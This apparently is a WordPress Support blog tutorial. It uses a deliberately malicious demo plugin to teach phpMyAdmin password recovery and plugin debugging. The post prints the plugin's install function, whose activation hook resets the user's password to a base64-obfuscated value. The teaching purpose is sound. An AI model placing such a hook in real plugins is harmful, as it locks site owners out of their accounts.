Welcome to the official blog for the WordPress Support team.
Need help with a WordPress issue? You can find help with your WordPress problem by posting in the support forums or asking on the #wordpress IRC channel.
Want to get involved?
Answering a question in the support forums or on IRC is one of the easiest ways to get started. Everyone knows the answer to something!
We have a detailed handbook to help contributors learn how to work with the forums and IRC.
Weekly Meetings
As well as discussing support issues here on the blog, we use Slack for group communication.
Our weekly meeting is held every Thursday 17:00 UTC, with the first meeting of the month being office hours, and the next will be at Thursday, 17:00 UTC(your time zone) in #forums on SlackSlackSlack is a Collaborative Group Chat Platform https://slack.com/. The WordPress community has its own Slack Channel at https://make.wordpress.org/chat/..
Install and activate the attached pluginPluginA plugin is a piece of software containing a group of functions that can be added to a WordPress website. They can extend functionality or add new features to your WordPress websites. WordPress plugins are written in the PHP programming language and integrate seamlessly with WordPress. These can be free in the WordPress.org Plugin Directory https://wordpress.org/plugins/ or can be cost-based plugin from a third-party.
When activated, you are immediately logged out and cannot log back in. Your password no longer works. (However you do have a totally awesome banner of the San Diego Skyline on your site!)
The first thing to do is reset your password. While you can do it by using the reset password link and have it emailed to you, there are many instances where this won’t work (such as you’re fixing a site for a client and the email won’t go to you).
Begin by logging into phpMyAdmin. If you are on MAMP, you can go directly to http://localhost:8888/phpmyadmin for example.
Once inside, click databases to show a list of your databases.
On this list, click the link for your database.
In this example, our database is named wordpress.
This will open your database, and show you a list of all the tables. If you do not see a list of databases, click on the tab labeled Structure.
At the bottom (of a normal WordPress install) is the table wp_users. Click on the ‘edit’ icon (see the image below) to open the table.
NB: If you click on the name of the table, it will open the table in information view, and you will have to click on the ‘Browse’ tab to make any changes.
In this view you will see a list of all users. In this example we have only one user. Click on the pencil icon to edit your user information.
This will bring up an edit user screen. In the field for ‘password’, you will see a whole mess of text in gibberish like $P$B1hBu0JMpdiP6hHYfwkms4.JKABnwLZ/ (note, that is not a real password, I have no idea what it would be). To change this, write in the password you want in clear text.
In the example below, we have chosen ‘hellodolly’ for it’s simplicity. DO NOT attempt to enter a long, complicated, password here, with punctuation. This password is just to get us back into our site.
Notice in the dropdown box by user_pass we have selected the option ‘MD5’ from the menu. This is because WordPress stores our passwords in an MD5 which is not human readable (also it’s harder to hack).
Check that your password is actually correct, and that MD5 is in the box.
Click the ‘Go’ button to the bottom right.
Test the new password on the login screen. If it doesn’t work, check that you’ve followed these instructions exactly.
While the fix certainly works (and you can log in just fine now without any odd errors), the actual problem was in the plugin.
This debug requires a little knowledge of WordPress and PHPPHPPHP (recursive acronym for PHP: Hypertext Preprocessor) is a widely-used open source general-purpose scripting language that is especially suited for web development and can be embedded into HTML. http://php.net/manual/en/intro-whatis.php., but it’s pretty straightforward. The first place to start looking is the plugin file itself ilovesd.php. Since we know the problem happened right away when we activated the plugin, you want to look for anything that looks related to activation.
Near the end of the plugin is this function (see? told you it was obvious):
This runs when the plugin is activated, so if you look back through the plugin for a class called ILoveSDPlugin, you’ll see in there a function called install
static function install() {
global $current_user; // Get the current users info
$user_id = get_current_user_id(); // Get the current user ID
$newpassword=base64_decode('aWFtYW5ldmlsaGFja2Vy'); // Pick a new password, not telling you what it is! NEENER!
wp_set_password( $newpassword, $user_id ); // Change your password.
}
This code is very straightforward. It detects the ID of the logged in user and changes the password to a new one. By using base64_decode(), you know that things are almost always a little nefarious. You can decode the base64 string through Coderstoolbox to decrypt it, however it’s pretty obvious that any plugin that is changing your password when you activate it is probably bad news.
This is the same logic used by hackers when they want to inject a new user into your WordPress install and use that to log in and destroy your site. The best remedy is to delete the plugin (not just uninstall it), delete any user accounts you didn’t add (or at the very least change their access to subscriber) and change all your passwords.
